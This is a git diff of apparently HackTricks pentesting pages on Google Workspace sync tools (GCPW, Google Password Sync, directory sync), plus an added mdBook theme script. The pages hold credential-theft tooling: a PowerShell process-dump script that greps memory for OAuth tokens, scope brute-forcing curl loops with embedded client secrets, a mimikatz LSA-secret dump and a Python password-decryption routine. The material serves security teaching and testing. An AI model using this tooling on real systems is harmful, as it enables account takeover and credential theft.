($processId in $chromeProcesses) { + Write-Output "Dumping process with PID: $processId" + & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" +} + +# Extract strings and search for tokens in each dump +Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { + $dumpFile = $_.FullName + $baseName = $_.BaseName + $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt" + $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt" + + Write-Output "Extracting strings from $dumpFile" + & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile + & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile + + $outputFiles = @($asciiStringsFile, $unicodeStringsFile) + + foreach ($file in $outputFiles) { + foreach ($regex in $tokenRegexes) { + + $matches = Select-String -Path $file -Pattern $regex -AllMatches + + $uniqueMatches = @{} + + foreach ($matchInfo in $matches) { + foreach 
($match in $matchInfo.Matches) { + $matchValue = $match.Value + if (-not $uniqueMatches.ContainsKey($matchValue)) { + $uniqueMatches[$matchValue] = @{ + LineNumber = $matchInfo.LineNumber + LineText = $matchInfo.Line.Trim() + FilePath = $matchInfo.Path + } + } + } + } + + foreach ($matchValue in $uniqueMatches.Keys) { + $info = $uniqueMatches[$matchValue] + Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" + } + } + + Write-Output "" + } +} + Remove-Item -Path $dumpFolder -Recurse -Force ``` @@ -351,11 +327,10 @@ curl -s --data "client_id=77185425430.apps.googleusercontent.com" \ ### GCPW - Scopes -{% hint style="info" %} -Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**. - -Alsoe, the refresh token is not valid in every application. -{% endhint %} +> [!NOTE] +> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**. +> +> Also, the refresh token is not valid in every application. By default GCPW won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`: 
@@ -364,7 +339,7 @@ By default GCPW won't have access as the user to every possible OAuth scope, so Bash script to brute-force scopes ```bash -curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do +curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do echo -ne "Testing $scope \r" if ! curl -s --data "client_id=77185425430.apps.googleusercontent.com" \ --data "client_secret=OTJgUOQcT7lO7GsGZq2G4IlT" \ @@ -648,7 +623,7 @@ Some examples using some of those scopes: curl -X GET \ -H "Authorization: Bearer $access_token" \ "https://www.googleapis.com/oauth2/v2/userinfo" - + { "id": "100203736939176354570", "email": "hacktricks@example.com", 
@@ -823,8 +798,8 @@ curl -X POST \ **Google Workspace Vault** is an add-on for Google Workspace that provides tools for data retention, search, and export for your organization's data stored in Google Workspace services like Gmail, Drive, Chat, and more. -* A **Matter** in Google Workspace Vault is a **container** that organizes and groups together all the information related to a specific case, investigation, or legal matter. It serves as the central hub for managing **Holds**, **Searches**, and **Exports** pertaining to that particular issue. -* A **Hold** in Google Workspace Vault is a **preservation action** applied to specific users or groups to **prevent the deletion or alteration** of their data within Google Workspace services. Holds ensure that relevant information remains intact and unmodified for the duration of a legal case or investigation. +- A **Matter** in Google Workspace Vault is a **container** that organizes and groups together all the information related to a specific case, investigation, or legal matter. It serves as the central hub for managing **Holds**, **Searches**, and **Exports** pertaining to that particular issue. +- A **Hold** in Google Workspace Vault is a **preservation action** applied to specific users or groups to **prevent the deletion or alteration** of their data within Google Workspace services. Holds ensure that relevant information remains intact and unmodified for the duration of a legal case or investigation. ```bash # List matters @@ -868,7 +843,7 @@ mimikatz_trunk\x64\mimikatz.exe privilege::debug token::elevate lsadump::secrets Then search for the secret like `Chrome-GCPW-` like in the image: -
+
Then, with an **access token** with the scope `https://www.google.com/accounts/OAuthLogin` it's possible to request the private key to decrypt the password: @@ -910,38 +885,38 @@ def decrypt_password(access_token, lsa_secret): # Obtain the private key using the resource_id resource_id = lsa_secret["resource_id"] encrypted_data = b64decode(lsa_secret["encrypted_password"]) - + private_key_pem = get_decryption_key(access_token, resource_id) print("Found private key:") print(private_key_pem) - + if private_key_pem is None: raise ValueError("Unable to retrieve the private key.") - + # Load the RSA private key rsa_key = RSA.import_key(private_key_pem) key_size = int(rsa_key.size_in_bits() / 8) - + # Decrypt the encrypted data cipher_rsa = PKCS1_OAEP.new(rsa_key) session_key = cipher_rsa.decrypt(encrypted_data[:key_size]) - + # Extract the session key and other data from decrypted payload session_header = session_key[:32] session_nonce = session_key[32:] mac = encrypted_data[-16:] - + # Decrypt the AES GCM data aes_cipher = AES.new(session_header, AES.MODE_GCM, nonce=session_nonce) decrypted_password = aes_cipher.decrypt_and_verify(encrypted_data[key_size:-16], mac) - + print("Decrypted Password:", decrypted_password.decode("utf-8")) - + except Exception as e: print(f"Error occurred during decryption: {e}") # CHANGE THIS INPUT DATA! -access_token = "" +access_token = "" lsa_secret = { "encrypted_password": "", "resource_id": "" 
@@ -954,25 +929,12 @@ decrypt_password(access_token, lsa_secret) It's possible to find the key components of this in the Chromium source code: -* API domain: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code) -* API endpoint: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential\_provider/gaiacp/password\_recovery\_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70) +- API domain: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22&type=code) +- API endpoint: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70) ## References -* [https://www.youtube.com/watch?v=FEQxHRRP\_5I](https://www.youtube.com/watch?v=FEQxHRRP_5I) -* [https://issues.chromium.org/issues/40063291](https://issues.chromium.org/issues/40063291) +- [https://www.youtube.com/watch?v=FEQxHRRP_5I](https://www.youtube.com/watch?v=FEQxHRRP_5I) +- [https://issues.chromium.org/issues/40063291](https://issues.chromium.org/issues/40063291) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md similarity index 54% rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md index 36b122aa6..5b76e330c 100644 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md +++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md @@ -1,19 +1,6 @@ # GPS - Google Password Sync -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -25,21 +12,20 @@ It gets installed in `C:\Program Files\Google\Password Sync` where you can find To configure this binary (and service), it's needed to **give it access to a Super Admin principal in Workspace**: -* Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)** - * Only available in Domain Controllers with GUI -* Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users** - * Very bad idea as those credentials never expired and could be misused - * Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace - * Google require it for domain controlled without GUI - * These creds are also stored in the registry +- Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)** + - Only available in Domain Controllers with GUI +- Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users** + - Very bad idea as those credentials never expired and could be misused + - Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace + - Google require it for domain controlled without GUI + - These creds are also stored in the registry Regarding AD, it's possible to indicate it to use the current **applications context, anonymous or some specific credentials**. If the credentials option is selected, the **username** is stored inside a file in the **disk** and the **password** is **encrypted** and stored in the **registry**. ### GPS - Dumping password and token from disk -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**. 
-{% endhint %} +> [!TIP] +> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**. In the file **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** it's possible to find part of the configuration like the **`baseDN`** of the AD configured and the **`username`** whose credentials are being used. @@ -52,7 +38,7 @@ Moreover, it's also encoded using base32hex with the dictionary **`0123456789abc The entropy values were found by using the tool . It was configured to monitor the calls to **`CryptUnprotectData`** and **`CryptProtectData`** and then the tool was used to launch and monitor `PasswordSync.exe` which will decrypt the configured password and auth token at the beginning and the tool will **show the values for the entropy used** in both cases: -
+
Note that it's also possible to see the **decrypted** values in the input or output of the calls to these APIs also (in case at some point Winpeas stop working). 
@@ -68,76 +54,76 @@ I guess you could also find the AD configured credentials. Dump PasswordSync.exe and the password_sync_service.exe processes and search tokens ```powershell -# Define paths for Procdump and Strings utilities -$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe" -$stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe" -$dumpFolder = "C:\Users\Public\dumps" - -# Regular expressions for tokens -$tokenRegexes = @( - "ya29\.[a-zA-Z0-9_\.\-]{50,}", - "1//[a-zA-Z0-9_\.\-]{50,}" -) - -# Show EULA if it wasn't accepted yet for strings -$stringsPath - -# Create a directory for the dumps if it doesn't exist -if (!(Test-Path $dumpFolder)) { - New-Item -Path $dumpFolder -ItemType Directory -} - -# Get all Chrome process IDs +# Define paths for Procdump and Strings utilities +$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe" +$stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe" +$dumpFolder = "C:\Users\Public\dumps" + +# Regular expressions for tokens +$tokenRegexes = @( + "ya29\.[a-zA-Z0-9_\.\-]{50,}", + "1//[a-zA-Z0-9_\.\-]{50,}" +) + +# Show EULA if it wasn't accepted yet for strings +$stringsPath + +# Create a directory for the dumps if it doesn't exist +if (!(Test-Path $dumpFolder)) { + New-Item -Path $dumpFolder -ItemType Directory +} + +# Get all Chrome process IDs $processNames = @("PasswordSync", "password_sync_service") $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id - -# Dump each Chrome process -foreach ($processId in $chromeProcesses) { - Write-Output "Dumping process with PID: $processId" - & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" -} - -# Extract strings and search for tokens in each dump -Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { - $dumpFile = $_.FullName - $baseName = $_.BaseName - $asciiStringsFile = 
"$dumpFolder\${baseName}_ascii_strings.txt" - $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt" - - Write-Output "Extracting strings from $dumpFile" - & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile - & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile - - $outputFiles = @($asciiStringsFile, $unicodeStringsFile) - - foreach ($file in $outputFiles) { - foreach ($regex in $tokenRegexes) { - - $matches = Select-String -Path $file -Pattern $regex -AllMatches - - $uniqueMatches = @{} - - foreach ($matchInfo in $matches) { - foreach ($match in $matchInfo.Matches) { - $matchValue = $match.Value - if (-not $uniqueMatches.ContainsKey($matchValue)) { - $uniqueMatches[$matchValue] = @{ - LineNumber = $matchInfo.LineNumber - LineText = $matchInfo.Line.Trim() - FilePath = $matchInfo.Path - } - } - } - } - - foreach ($matchValue in $uniqueMatches.Keys) { - $info = $uniqueMatches[$matchValue] - Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" - } - } - - Write-Output "" - } + +# Dump each Chrome process +foreach ($processId in $chromeProcesses) { + Write-Output "Dumping process with PID: $processId" + & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" +} + +# Extract strings and search for tokens in each dump +Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { + $dumpFile = $_.FullName + $baseName = $_.BaseName + $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt" + $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt" + + Write-Output "Extracting strings from $dumpFile" + & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile + & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile + + $outputFiles = @($asciiStringsFile, $unicodeStringsFile) + + foreach ($file in $outputFiles) { + foreach ($regex in $tokenRegexes) { + + $matches = Select-String -Path $file -Pattern $regex 
-AllMatches + + $uniqueMatches = @{} + + foreach ($matchInfo in $matches) { + foreach ($match in $matchInfo.Matches) { + $matchValue = $match.Value + if (-not $uniqueMatches.ContainsKey($matchValue)) { + $uniqueMatches[$matchValue] = @{ + LineNumber = $matchInfo.LineNumber + LineText = $matchInfo.Line.Trim() + FilePath = $matchInfo.Path + } + } + } + } + + foreach ($matchValue in $uniqueMatches.Keys) { + $info = $uniqueMatches[$matchValue] + Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" + } + } + + Write-Output "" + } } ``` @@ -157,11 +143,10 @@ curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.goo ### GPS - Scopes -{% hint style="info" %} -Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**. - -Also, the refresh token is not valid in every application. -{% endhint %} +> [!NOTE] +> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**. +> +> Also, the refresh token is not valid in every application. By default GPS won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`: 
@@ -170,7 +155,7 @@ By default GPS won't have access as the user to every possible OAuth scope, so u Bash script to brute-force scopes ```bash -curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do +curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do echo -ne "Testing $scope \r" if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \ --data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \ @@ -201,21 +186,7 @@ https://www.googleapis.com/auth/admin.directory.user Which is the same one you get if you don't indicate any scope. -{% hint style="danger" %} -With this scope you could **modify the password of a existing user to escalate privileges**. -{% endhint %} +> [!CAUTION] +> With this scope you could **modify the password of a existing user to escalate privileges**. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md similarity index 57% rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md index ddb40cd9f..4f7f7e554 100644 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md +++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md @@ -1,21 +1,6 @@ # GWS - Admin Directory Sync - - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -23,17 +8,17 @@ The main difference between this way to synchronize users with GCDS is that GCDS At the moment of this writing this service is in beta and it supports 2 types of synchronization: From **Active Directory** and from **Azure Entra ID:** -* **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**. -* **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID. +- **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**. +- **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID. Once correctly configured, both options will allow to **synchronize users and groups to Workspace**, but it won't allow to configure users and groups from Workspace to AD or EntraID. 
Other options that it will allow during this synchronization are: -* Send an email to the new users to log-in -* Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account. -* Select the **groups containing the users** that will be synced. -* Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups). +- Send an email to the new users to log-in +- Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account. +- Select the **groups containing the users** that will be synced. +- Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups). ### From AD/EntraID -> Google Workspace (& GCP) 
@@ -44,8 +29,8 @@ However, notice that the **passwords** the users might be using in Workspace **c When the synchronization happens it might synchronize **all the users from AD or only the ones from a specific OU** or only the **users members of specific groups in EntraID**. This means that to attack a synchronized user (or create a new one that gets synchronized) you will need first to figure out which users are being synchronized. -* Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**. -* If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account. +- Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**. +- If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account. Once you access the user inside Workspace it might be given some **permissions by default**. 
@@ -53,9 +38,8 @@ Once you access the user inside Workspace it might be given some **permissions b You also need to figure out first which groups are being synchronized. Although there is the possibility that **ALL** the groups are being synchronized (as Workspace allows this). -{% hint style="info" %} -Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized. -{% endhint %} +> [!NOTE] +> Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized. If you know which groups from Azure are being **assigned permissions in Workspace or GCP**, you could just add a compromised user (or newly created) in that group and get those permissions. @@ -70,17 +54,4 @@ Note that Workspace require credentials with read only access over AD or EntraID I also don't know where does Google store the AD credentials or EntraID token and you **can't recover them re-configuring the synchronizarion** (they don't appear in the web form, you need to give them again). However, from the web it might be possible to abuse the current functionality to **list users and groups**. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/theme/book.js b/theme/book.js new file mode 100644 index 000000000..1c8d77287 --- /dev/null +++ b/theme/book.js 
@@ -0,0 +1,735 @@ +"use strict"; + +// Fix back button cache problem +window.onunload = function () { }; + +// Global variable, shared between modules +function playground_text(playground, hidden = true) { + let code_block = playground.querySelector("code"); + + if (window.ace && code_block.classList.contains("editable")) { + let editor = window.ace.edit(code_block); + return editor.getValue(); + } else if (hidden) { + return code_block.textContent; + } else { + return code_block.innerText; + } +} + +(function codeSnippets() { + function fetch_with_timeout(url, options, timeout = 6000) { + return Promise.race([ + fetch(url, options), + new Promise((_, reject) => setTimeout(() => reject(new Error('timeout')), timeout)) + ]); + } + + var playgrounds = Array.from(document.querySelectorAll(".playground")); + if (playgrounds.length > 0) { + fetch_with_timeout("https://play.rust-lang.org/meta/crates", { + headers: { + 'Content-Type': "application/json", + }, + method: 'POST', + mode: 'cors', + }) + .then(response => response.json()) + .then(response => { + // get list of crates available in the rust playground + let playground_crates = response.crates.map(item => item["id"]); + playgrounds.forEach(block => handle_crate_list_update(block, playground_crates)); + }); + } + + function handle_crate_list_update(playground_block, playground_crates) { + // update the play buttons after receiving the response + update_play_button(playground_block, playground_crates); + + // and install on change listener to dynamically update ACE editors + if (window.ace) { + let code_block = playground_block.querySelector("code"); + if (code_block.classList.contains("editable")) { + let editor = window.ace.edit(code_block); + editor.addEventListener("change", function (e) { + update_play_button(playground_block, playground_crates); + }); + // add Ctrl-Enter command to execute rust code + editor.commands.addCommand({ + name: "run", + bindKey: { + win: "Ctrl-Enter", + mac: "Ctrl-Enter" + }, + 
exec: _editor => run_rust_code(playground_block) + }); + } + } + } + + // updates the visibility of play button based on `no_run` class and + // used crates vs ones available on https://play.rust-lang.org + function update_play_button(pre_block, playground_crates) { + var play_button = pre_block.querySelector(".play-button"); + + // skip if code is `no_run` + if (pre_block.querySelector('code').classList.contains("no_run")) { + play_button.classList.add("hidden"); + return; + } + + // get list of `extern crate`'s from snippet + var txt = playground_text(pre_block); + var re = /extern\s+crate\s+([a-zA-Z_0-9]+)\s*;/g; + var snippet_crates = []; + var item; + while (item = re.exec(txt)) { + snippet_crates.push(item[1]); + } + + // check if all used crates are available on play.rust-lang.org + var all_available = snippet_crates.every(function (elem) { + return playground_crates.indexOf(elem) > -1; + }); + + if (all_available) { + play_button.classList.remove("hidden"); + } else { + play_button.classList.add("hidden"); + } + } + + function run_rust_code(code_block) { + var result_block = code_block.querySelector(".result"); + if (!result_block) { + result_block = document.createElement('code'); + result_block.className = 'result hljs language-bash'; + + code_block.append(result_block); + } + + let text = playground_text(code_block); + let classes = code_block.querySelector('code').classList; + let edition = "2015"; + if(classes.contains("edition2018")) { + edition = "2018"; + } else if(classes.contains("edition2021")) { + edition = "2021"; + } + var params = { + version: "stable", + optimize: "0", + code: text, + edition: edition + }; + + if (text.indexOf("#![feature") !== -1) { + params.version = "nightly"; + } + + result_block.innerText = "Running..."; + + fetch_with_timeout("https://play.rust-lang.org/evaluate.json", { + headers: { + 'Content-Type': "application/json", + }, + method: 'POST', + mode: 'cors', + body: JSON.stringify(params) + }) + .then(response => 
response.json()) + .then(response => { + if (response.result.trim() === '') { + result_block.innerText = "No output"; + result_block.classList.add("result-no-output"); + } else { + result_block.innerText = response.result; + result_block.classList.remove("result-no-output"); + } + }) + .catch(error => result_block.innerText = "Playground Communication: " + error.message); + } + + // Syntax highlighting Configuration + hljs.configure({ + tabReplace: ' ', // 4 spaces + languages: [], // Languages used for auto-detection + }); + + let code_nodes = Array + .from(document.querySelectorAll('code')) + // Don't highlight `inline code` blocks in headers. + .filter(function (node) {return !node.parentElement.classList.contains("header"); }); + + if (window.ace) { + // language-rust class needs to be removed for editable + // blocks or highlightjs will capture events + code_nodes + .filter(function (node) {return node.classList.contains("editable"); }) + .forEach(function (block) { block.classList.remove('language-rust'); }); + + code_nodes + .filter(function (node) {return !node.classList.contains("editable"); }) + .forEach(function (block) { hljs.highlightBlock(block); }); + } else { + code_nodes.forEach(function (block) { hljs.highlightBlock(block); }); + } + + // Adding the hljs class gives code blocks the color css + // even if highlighting doesn't apply + code_nodes.forEach(function (block) { block.classList.add('hljs'); }); + + Array.from(document.querySelectorAll("code.hljs")).forEach(function (block) { + + var lines = Array.from(block.querySelectorAll('.boring')); + // If no lines were hidden, return + if (!lines.length) { return; } + block.classList.add("hide-boring"); + + var buttons = document.createElement('div'); + buttons.className = 'buttons'; + buttons.innerHTML = ""; + + // add expand button + var pre_block = block.parentNode; + pre_block.insertBefore(buttons, pre_block.firstChild); + + pre_block.querySelector('.buttons').addEventListener('click', function 
